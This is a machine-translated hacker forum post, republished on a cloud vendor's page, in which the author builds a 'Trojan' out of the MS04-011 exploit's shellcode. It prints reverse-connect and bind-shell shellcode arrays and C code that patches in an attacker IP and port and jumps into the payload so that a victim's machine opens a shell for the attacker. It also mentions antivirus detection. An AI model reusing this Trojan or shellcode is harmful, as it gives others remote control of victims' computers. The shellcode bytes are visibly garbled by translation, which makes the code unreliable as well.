From ms04011 to sunlion Trojan V1.0

Source: Internet
Author: User
Tags htons
From ms04011 to sunlion Trojan V1.0
*********** ****************
* Author: sunlion [est] Hut: http://evilsun.126.com
* Organization: China evil baboons http://www.eviloctal.com Co., http://www.eviloctal.com/forum.
* ********************** Reprinted, Please retain the author information ************ ************
A few days ago, I saw a person write a small program for rebounding rows, and I thought it was good. So I also wanted to write a program, but I found it only when I really wanted to write it, in fact, this program is not that simple. In fact, I am a cainiao, an EST cainiao with very good dishes. I don't know anything!
The parameter after the supervisor program runs is sent to us. In fact, this is my idea. Well, I thought about it myself. Can such a program have permissions? No. The permission you get is not the admin permission. So if you want to develop such a program yourself, it will not work at my current level!
I am a cainiao, but I have the courage and confidence to improve my abilities!
It's okay, but it's not that easy to implement! Later, I thought about the original winshell.exe code. Remember, this is the work of the lonely swordsman. Haha, it's a pretty cool little program. So I read the winshell code several times that day, I basically recognized the principles and functions of winshell and used some methods in it. Oh, it's really not easy. I have used a lot of functions in it and I have to check them and check n more, haha, then I met a class that I had to go to, so that I could not read the code in the dormitory, and finally I printed it. On 22 pages, I sent a lot of money to me!
After reading the winshell code, I found that his principle is different from our requirements. But after reading the code, I still have a great success, it contains information about how to write Trojans into system services, etc. The code in it is really rich and useful, haha!
Finally, I thought about the ms04011.exe overflow program. Everyone knows about this overflow program. As long as the recipient's computer has the ms04011 vulnerability, I use this program to locally use NC to listen to a port and take the recipient to connect to the local device, so we get a shell from the other party. Well, what are you waiting for? So we browsed all the code in exploit in the est forum, finally, I found the ms04011 code on the last few pages. Haha!
I used n-plus functions, so I checked them all the way. I was so tired, huh, but I still read it for my program! Well, let's write it here. Let's take a look at the code of ms04011. I won't post them all because it's too long. If there is a function that doesn't exist in it, you can go to the est forum and have a post in the C language version named <XXXX in the C language programming site>. In this article, you can basically get all the functions you don't know, check it by yourself :)! That post was posted to the est forum after I checked it in ms04011. The following code is analyzed:
Usage: expl <target> <victim ip> <bindport> [connectback IP] [Options] Now let's take a look at its usage, we can see that there is no <bindport> [connectback IP] in it. This is what we want to use. We only need to use a program in it. Open the code and the shellcode will come in, unsigned char reverseshell []; unsigned char bindshell []; char req1 []; char req2 []... Wait, the shellcode payment is complete, and the following program can be called!
.
.
.
(Program omitted)
Int main (INT argc, char * argv []) at this time we came to his main function, where argc counts the number of parameters following our program, argv [] is a character pointer type that stores the parameters following the program running. The details are as follows: * argc: integer. The number of command line parameters that are passed to main () after the program runs, * argv: string Array. In dos 3.x, argv [0] is the full path name of the program running. For versions earlier than DOS 3.0, argv [0] is an empty string ("").
Argv [1] is the first string after the program name is executed in the doscommand line;
Argv [2] is the second string after the execution program name;
...
Argv [argc] is null. This main function team is not very important, because it is very important for the code I want to analyze ,..... (Omitted Intermediate Program) the following program comes here:
If (argc> 4) // here we start to judge the number of input parameters. If it is greater than 4, this is an active connection or rebound!
If (! Memcmp (argv [4], "-T", 2) opt = 1; // compare whether the input parameter contains-t, if there is so opt = 1, it is a port bound to the other party. If there is no-T, opt = 0 (this is his initial value), it is a bounce back to connect to our port,
If (argc> 4 )&&! OPT) {// The program initializes opt to 0, if opt = 0! OPT is true!
Port = htons (atoi (argv [3]) ^ (ushort) 0x9999; // get the input port
IP = inet_addr (argv [4]) ^ (ulong) 0x99999999; // obtain the Entered IP address.
Memcpy (& reverseshell [118], & Port, 2); // copy the port to the shellcode code in the memory.
Memcpy (& reverseshell [111], & IP, 4); // copy the IP address to the shellcode code in the memory.
SC = reverseshell; // here we use the defined shellcole to pay the SC!
} Else {// If opt = 1, it indicates there is-T in it, and enter the port type of the port.
Port = htons (atoi (argv [3]) ^ (ushort) 0x9999; // get the input port
Memcpy (& bindshell [176], & Port, 2); // copy the port to the shellcode code in the memory.
SC = bindshell; // The shellcode section of the bindshell I defined is used to send it to SC.
}
When we see the program here, we basically know that ms04011 is used to bind the port or rebound to our computer. It is important to use the two shellcodes defined above, one being unsigned char reverseshell []. The other is unsigned char bindshell []; in fact, there are a lot of code below, so I will not analyze it, because it is useless to write Trojans;
Here, we can conclude that ms04011 can bind a port and rebound to our computer, which is related to shellcode. What is shellcode, why does shellcode rebound to connect to our computer and we get shellcode? In fact, it is hard to say clearly, because I don't even know much about it! I checked the information:
Shellcode generally obtains the execution right through overflow and calls the API of the target system for some work during execution, therefore, shellcode is required to use a common method to obtain the API function address of the target system. Secondly, because the running address is difficult to determine, it is necessary to adopt a dynamic method for data addressing. In addition, shellcode is generally sent to the attacked program as data. Ms04011 is the form of sending shellcode to the recipient's computer. What we want to use is to use shellcode as a Trojan for others to implement and establish a WinSock to connect to our computer, then we can get the permission, which is why we get the shell. Currently, two popular methods are used to compile and extract shellcode: C language and assembly language. Ms04011 adds an encoding code to the program, which is what we call the two shellcodes. To achieve our goal. Of course, shellcode can be clearly stated in one or two statements. Simply put, as long as we execute a special shellcode, we will get the permission. If so, then we can regard shellcode as a subroutine in the assembly! So far, we have figured out our ideas. How can I let the other Party implement our shellcod? Once you have learned the assembly, you will know that when you want to implement its subroutine in the Assembly, I use the call Pn, (PN is the label of a subprogram we define, this label is often the entry of our subroutine, which is the offset address of the CS code segment in the memory.) So when we want our Trojan to execute this shellcode, of course, call cannot be used in VC, because it is a pseudo command in assembly, and VC does not have this pseudo command, so we need to embed the assembly code in VC, we need to use _ ASM {} to implement the shellcode that has been loaded in the memory. Haha, sunlion [est] will just start the compilation course this semester, I also made a lot of research on win32asm a few days ago and finally used it here! Okay, that's how it works!
Now we need to write this trojan by ourselves. The shellcode has already appeared, that is, the reverseshell [] and bindshell [] In ms04011. As long as we implement this code, we can get the permission, but we all want to see why ms04011 can bind a port and connect to our computer? In fact, these functions are included in shellcode. Why does ms04011 need to obtain the following parameters, such as IP address and port, what's more, we also write the extracted IP address and port to the shellcode (that's it for easy understanding? Stupid, if we don't put the IP address and port in it, then the other party will not be able to connect to it after implementing shellcode, so we need to write the IP address and port into it, in this way, after the computer implements shellcode, it will establish a Winsock with us to connect to our set IP address and port!
As a matter of fact, the main working principle of this trojan has come out, and friends who know programming will probably write their own programs here. Now I will show you an ugly one :)!
First, define the header file: # include <windows. h>

# Pragma comment (Lib, "ws2_32") // the header file required for Winsock Creation
Next, we will take the shellcode in ms04011 as an example:
// Reverse shellcode. Here, the offset of the plug-in port used for reverse connection is 118, and the offset of the inserted IP address is 111.
Unsigned char reverseshell [] =
"/Xeb/x10/x5b/x4b/x33/xc9/x66/xb9/x25/x01/X80/x34/x0b/x99/xe2/xfa"
"/Xeb/x05/xe8/xeb/xFF"
"/Cross city/x62/x99/x99/x99/xc6/XFD/x38/xa9/x99/x99/x99/X12/xd9/x95/X12"
"/Xe9/x85/x34/X12/xf1/x91/X12/x6e/xf3/x9d/xc0/x71/x02/x99/x99/x99"
"/X7b/X60/xf1/xAA/XAB/x99/x99/xf1/xee/xea/XAB/xc6/XCD/x66/x8f/X12"
"/X71/xf3/x9d/xc0/x71/x1b/x99/x99/x99/x7b/X60/X18/x75/x09/x98/x99"
"/X99/XCD/xf1/x98/x98/x99/x99/x66/xcf/x89/xc9/xc9/xc9/xc9/xd9/xc9"
"/Xd9/xc9/x66/xcf/x8d/X12/x41/xf1/xe6/x99/x99/x98/xf1/x9b/x99/x9d"
"/X4b/X12/x55/xf3/x89/xc8/xca/x66/xcf/x81/x1c/x59/xec/xD3/xf1/xfa"
"/Xf4/XFD/x99/x10/xFF/xa9/x1a/x75/XCD/x14/xa5/xbd/xf3/x8c/xc0/x32"
"/X7b/x64/x5f/xdd/xbd/x89/xdd/x67/xdd/xbd/Xa4/x10/xc5/xbd/XD1/x10"
"/Xc5/xbd/xd5/x10/xc5/xbd/xc9/x14/xdd/xbd/x89/XCD/xc9/xc8/xc8/xc8"
"/Xf3/x98/xc8/xc8/x66/XeF/xa9/xc8/x66/xcf/x9d/X12/x55/xf3/x66/x66"
"/XA8/x66/xcf/x91/xca/x66/xcf/x85/x66/xcf/x95/xc8/xcf/X12/xdc/xa5"
"/X12/XCD/xb1/xe1/x9a/x4c/xcb/X12/xeb/xb9/x9a/x6c/xAA/x50/xd0/xd8"
"/X34/x9a/x5c/xAA/x42/x96/x27/x89/xa3/x4f/xed/x91/x58/X52/x94/x9a"
"/X43/xd9/x72/x68/xa2/x86/xec/x7e/xc3/X12/xc3/xbd/x9a/x44/xFF/X12"
"/X95/xd2/X12/xc3/x85/x9a/x44/X12/x9d/X12/x9a/x5c/x32/xc7/xc0/x5a"
"/X71/x99/x66/x66/x66/x17/xd7/x97/x75/xeb/x67/x2a/x8f/x34/X40/x9c"
"/X57/x76/x57/x79/xf9/X52/x74/X65/xa2/X40/x90/x6c/x34/x75/X60/x33"
"/Xf9/x7e/xe0/x5f/xe0 ";
// Bind shellcode here is the shellcode we need for active connection, and the offset of the inserted port is 176
Unsigned char bindshell [] =
"/Xeb/x10/x5a/x4a/x33/xc9/x66/xb9/x7d/x01/X80/x34/x0a/x99/xe2/xfa"
"/Xeb/x05/xe8/xeb/xFF"
"/Cross city/x95/x98/x99/x99/xc3/XFD/x38/xa9/x99/x99/x99/X12/xd9/x95/X12"
"/Xe9/x85/x34/X12/xd9/x91/X12/x41/X12/xea/xa5/X12/xed/x87/xe1/x9a"
"/X6a/X12/xe7/xb9/x9a/x62/X12/xd7/x8d/xAA/x74/xcf/xce/xc8/X12/xA6"
"/X9a/x62/X12/x6b/xf3/x97/xc0/x6a/x3f/xed/x91/xc0/xc6/x1a/x5e/x9d"
"/Xdc/x7b/xc0/xc6/xc7/X12/x54/X12/xdf/xbd/x9a/x5a/x48/x78/x9a"
"/X58/xAA/x50/xFF/X12/x91/X12/xdf/x85/x9a/x5a/x58/x78/x9b/x9a/x58"
"/X12/x99/x9a/x5a/X12/x63/X12/x6e/x1a/x5f/x97/X12/x49/xf3/x9a/xc0"
"/X71/x1e/x99/x99/x1a/x5f/x94/xcb/xcf/x66/xce/X65/xc3/X12/x41"
"/Xf3/x9c/xc0/x71/xed/x99/x99/x99/xc9/xc9/xc9/xc9/xf3/x98/xf3/x9b"
"/X66/xce/x75/X12/x41/x5e/x9e/x9b/x99/x9d/x4b/xAA/x59/x10/xde/x9d"
"/Xf3/x89/xce/xca/x66/xce/x69/xf3/x98/xca/x66/xce/x6d/xc9/xc9/xca"
"/X66/xce/x61/X12/x49/x1a/x75/xdd/X12/x6d/xAA/x59/xf3/x89/xc0/x10"
"/X9d/x17/x7b/x62/x10/xcf/xA1/x10/xcf/xa5/x10/xcf/xd9/xFF/x5e/xdf"
"/Xb5/x98/x98/x14/xde/x89/xc9/xcf/xAA/x50/xc8/xc8/xc8/xf3/x98/xc8"
"/Xc8/x5e/xde/xa5/xfa/xf4/XFD/x99/x14/xde/xa5/xc9/xc8/x66/xce/x79"
"/Xcb/x66/xce/X65/xca/x66/xce/X65/xc9/x66/xce/x7d/xAA/x59/x35/x1c"
"/X59/xec/X60/xc8/xcb/xcf/xca/x66/x4b/xc3/xc0/x32/x7b/x77/xAA/x59"
"/X5a/x71/x76/x67/x66/x66/xde/xfc/xed/xc9/xeb/xf6/xfa/xd8/XFD"
"/Xeb/xfc/xea/x99/xda/xeb/xfc/xf8/xed/xfc/xc9/xeb/xf6/xfa/xfc"
"/Xea/xd8/x99/xdc/xe1/xf0/xed/XCD/xf1/xeb/xfc/xf8/XFD/x99/xd5"
"/Xf6/xf8/XFD/xd5/xf0/xfb/xeb/xf8/xeb/xe0/xd8/x99/xee/xea/XAB/xc6"
"/XAA/XAB/x99/xce/xca/xd8/xca/xf6/xfa/xf2/xfc/xed/xd8/x99/xfb/xf0"
"/Xf7/XFD/x99/xf5/xf0/xea/xed/xfc/xf7/x99/xf8/xfa/xfc/xe9/xed"
"/X99/xfa/xf5/xf6/xea/xfc/xea/xf6/xfa/xf2/xfc/xed/x99 ";
Then write the main part of the function:
Void main (INT argc, char * argv [])
{
Unsigned short port; defines the port
// Unsigned short stag;
Unsigned long IP; // defines the IP address.
Wsadata WSA;
Wsastartup (makeword (2, 2), & WSA); // This is the initial statement for Sock, which is called to Version 2.2.
If (argc = 2) // determine whether we want to actively connect or rebound the connection. If argc = 2, it indicates that I want to actively connect.
{
Port = htons (atoi (argv [1]) ^ (ushort) 0x9999; // extract the port based on the port I entered
Memcpy (& bindshell [176], & Port, 2); // copy it to a location where the bindshell offset in the memory is 176
_ ASM // here we will call the Assembly
{
Lea eax, bindshell // get the offset address of bindshell in memory
JMP eax // use the unconditional jump command to jump the program to the bindshell place to let the system implement our well-constructed shellcode
}
}
Else if (argc = 3) // here is the connection I want to rebound is
{

Port = htons (atoi (argv [1]) ^ (ushort) 0x9999; // extract the port
IP = inet_addr (argv [2]) ^ (ulong) 0x99999999; // extract IP

Memcpy (& reverseshell [118], & Port, 2); // copy the port to the cell where the shellcode memory offset address is 118
Memcpy (& reverseshell [111], & IP, 4); // copy the IP address to a memory unit with an offset of 111
_ ASM
{
Lea eax, reverseshell // get the offset address and store it in exa
JMP eax // Let the program jump here, implement
}
}

Else printf ("active connection usage: evilsun <listenport>/n reverse connection usage: evilsun <connectbackport> <connectbackip>/N "); // If the input parameter is not 2 or 3, you will be prompted for usage!
}
The basic framework of this program has been completed!
You can see if you already know about Trojans!
In fact, it is not easy to achieve this step. You know that when we read the ms04011, we didn't feel it when we read the two parts consecutively, but remember what the teacher said (... (Omitted) Haha, don't tell everyone :); I finally read the code carefully and carefully, and I started to think about how to use the code of ms04011, you should not think that at first I knew how to use the code in ms04011. if you carefully read the code in ms04011, then you will feel what I said, so not easy, huh, huh!
The ghost code is the program mentioned in the article "using CCProxy vulnerabilities to achieve free Internet access". I have written all the functions of the program in it, for a dozen K of codes, I have published the Code in the "member original" version in the est Forum. The code in this section promotes permissions and kills processes, you only need to use your brains to add the function of killing and releasing the fire wall here!
In fact, the trojan is not so simple. Here I just talked about the shelf. To improve the trojan, we need to have the trojan generator, A veteran like Guilin wrote a trojan which is very similar to me. I have one of his Trojans in his hand. He said they would not publish the trojan for himself. Haha, if you want it, ask Guilin veterans! He has written out the trojan generator. You can define the port and IP, and set the password when actively connecting!
It took me almost a week to write this program. Haha, I'm about to take the test in English level 4. I didn't have TMD last time. I had to work hard this time, so we do not estimate that we will not upgrade sunlion's personal Trojan V1.0 for the time being!
If you want something to do, ask Guilin veterans. Haha, you must add him to QQ. The QQ number is available on his website! I hate him every day. I guess he will give you a Trojan!
I would like to thank you for your patience. They have helped me a lot during my code reading. Thank you! I wanted to write a trojan generator by myself, but it was not easy to write it. The key was that I couldn't do it myself. In order to help me write the generator of this trojan, I have had a heated discussion with him, and I am tired of him. Haha, so I would like to thank the developers of the famous Eighth Army!
Haha, after writing, I called fengze [est] To test 5555555! Recognized by Feng Ze's Norton, prompting ms04011 to be dizzy! It is estimated that fengze's virus database is also relatively full, but it was not found in other anti-virus cases!
Now let's write the article here!

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.